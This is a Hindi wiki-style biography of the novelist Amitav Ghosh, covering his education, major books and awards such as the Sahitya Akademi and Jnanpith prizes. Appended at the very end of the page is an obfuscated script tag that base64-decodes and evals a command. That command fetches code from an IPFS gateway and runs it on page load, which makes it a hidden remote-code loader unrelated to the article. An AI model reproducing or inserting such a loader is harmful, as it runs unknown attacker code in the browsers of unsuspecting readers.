अमिताभ घोष

भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (वार्ता | योगदान) द्वारा परिवर्तित 07:35, 2 अक्टूबर 2022 का अवतरण (''''अमिताभ घोष'''(अंग्रेज़ी: ''Amitav Ghosh'', जन्म- 11 जुलाई, 1956)...' के साथ नया पृष्ठ बनाया)
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:नेविगेशन, खोजें

अमिताभ घोष(अंग्रेज़ी: Amitav Ghosh, जन्म- 11 जुलाई, 1956) अंग्रेज़ी भाषा के साहित्यकार हैं। उनके द्वारा रचित एक उपन्यास 'द शैडो लाइन्स' के लिये उन्हें सन 1989 में साहित्य अकादमी पुरस्कार से सम्मानित किया गया। उन्हें साल 2018 में 54वें 'ज्ञानपीठ पुरस्कार' से भी नवाजा जा चुका है।

  • अमिताभ घोष का जन्म 11 जुलाई, 1956 को कोलकाता, पश्चिम बंगाल के एक बंगाली परिवार में हुआ था।
  • शुरुआती पढ़ाई दून स्कूल में हुई, जहां विक्रम सेठ और रामचंद्र गुहा जैसे नामचीन समकालीन लेखक भी थे।
  • बाद में अमिताभ घोष ने  सेंट स्टीफेन कॉलेज तथा दिल्ली स्कूल ऑफ़ इकोनॉमिक्स से उच्च शिक्षा हासिल की।
  • वह ऑक्सफोर्ड डीफिल करने गए। बाद के सालों में क्वीन्स कॉलेज, न्यूयॉर्क और सोर्बोंने ने अमिताभ घोष को डॉक्टरेट की उपाधि भी दी।
  • पढ़ाई पूरी करने के बाद अमिताभ घोष ने कुछ समय तक दिल्ली के एक अखबार में नौकरी की और फिर पूरी तरह से लेखन से जुड़ गए।
  • अंग्रेज़ी के जाने-माने लेखक और उपन्यासकार अमिताव घोष को वर्ष 2018 के 'ज्ञानपीठ पुरस्कार' से सम्मानित किया गया। चयन समिति ने 54वां ज्ञानपीठ पुरस्कार अमिताव घोष को देने की घोषणा पहले ही कर दी थी। 'ज्ञानपीठ पुरस्कार' से सम्मानित होने वाले वह अंग्रेज़ी के पहले लेखक हैं।
  • अमिताव घोष की 'दी सर्किल ऑफ़ रीज़न', 'इन एन एंटीक लैंड', 'दी कलकत्ता क्रोमोजोम', 'दी शैडो लाइन्स', 'डांसिंग इन कंबोडिया', 'दी ग्लास पैलेस', 'दी हंग्री टाइड' और इबिस ट्राइलॉजी : सी ऑफ़ पॉपिस एवं रिवर ऑफ़ स्मोक जैसी पुस्तकें चर्चित रही हैं।
  • उनको उनके उपन्यास 'शैडो लाइन्स' के लिए 1989 में 'साहित्य अकादमी पुरस्कार' मिल चुका है। इसके अलावा 2007 में 'पद्म श्री' से भी नवाजे जा चुके हैं।
  • अमिताभ घोष की 'दी सर्किल ऑफ़ रीज़न' को 1990 में 'फ्रांस प्रिक्स मेडिसिस अवार्ड' भी मिल चुका है।[1]
  • लेखक अमिताभ घोष ने ‘द नटमेगस कर्स: पैरेबल्स फॉर ए प्लैनेट इन क्राइसिस' नामक पुस्तक लिखी है। यह जॉन मुर्रे द्वारा प्रकाशित है। पुस्तक जायफल की कहानी के माध्यम से आज दुनिया पर उपनिवेशवाद के प्रभाव के इतिहास के बारे में बात करती है। ‘द नटमेगस कर्स’ में अमिताभ घोष चर्चा करते हैं कि जायफल की अपने मूल बांदा द्वीपों से यात्रा मानव जीवन और पर्यावरण के शोषण की व्यापक औपनिवेशिक मानसिकता पर प्रकाश डालती है, जो आज भी मौजूद है। अमिताभ घोष की कुछ अन्य उल्लेखनीय कृतियों में 'इबिस ट्राइलॉजी' और ‘द ग्रेट डिरेंजमेंट’ शामिल हैं।[2]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. अंग्रेज़ी के जाने-माने लेखक अमिताव घोष हुए 54वें ज्ञानपीठ पुरस्कार से सम्मानित... (हिंदी) amarujala.com। अभिगमन तिथि: 02 अक्टूबर, 2022।
  2. अमिताभ घोष की नई किताब ‘द नटमेग’स कर्स’ (हिंदी) hindicurrentaffairs.adda247.com। अभिगमन तिथि: 02 अक्टूबर, 2022।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>